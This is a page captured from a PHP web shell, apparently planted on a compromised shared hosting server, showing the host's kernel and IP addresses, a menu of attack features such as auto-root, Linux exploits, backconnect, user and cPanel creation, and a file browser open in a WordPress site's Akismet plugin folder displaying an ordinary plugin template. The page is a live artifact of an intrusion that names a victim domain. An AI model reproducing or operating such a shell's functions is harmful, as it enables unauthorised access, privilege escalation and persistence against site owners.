Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.216.26.104
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
goldenreviesws.com /
wp-content /
plugins /
akismet /
views /
[ HOME SHELL ]
Name
Size
Permission
Action
activate.php
177
B
-rw-r--r--
config.php
14.94
KB
-rw-r--r--
connect-jp.php
4.98
KB
-rw-r--r--
enter.php
1.02
KB
-rw-r--r--
get.php
1017
B
-rw-r--r--
logo.php
770
B
-rw-r--r--
notice.php
13.65
KB
-rw-r--r--
predefined.php
318
B
-rw-r--r--
setup.php
318
B
-rw-r--r--
start.php
816
B
-rw-r--r--
stats.php
1.05
KB
-rw-r--r--
title.php
125
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : get.php
<?php //phpcs:disable VariableAnalysis // There are "undefined" variables here because they're defined in the code that includes this file as a template. $submit_classes_attr = 'akismet-button'; if ( isset( $classes ) && ( is_countable( $classes ) ? count( $classes ) : 0 ) > 0 ) { $submit_classes_attr = implode( ' ', $classes ); } ?> <form name="akismet_activate" action="https://akismet.com/get/" method="POST" target="_blank"> <input type="hidden" name="passback_url" value="<?php echo esc_url( Akismet_Admin::get_page_url() ); ?>"/> <input type="hidden" name="blog" value="<?php echo esc_url( get_option( 'home' ) ); ?>"/> <input type="hidden" name="redirect" value="<?php echo isset( $redirect ) ? $redirect : 'plugin-signup'; ?>"/> <button type="submit" class="<?php echo esc_attr( $submit_classes_attr ); ?>" value="<?php echo esc_attr( $text ); ?>"><?php echo esc_attr( $text ) . '<span class="screen-reader-text">' . esc_html__( '(opens in a new tab)', 'akismet' ) . '</span>'; ?></button> </form>
Close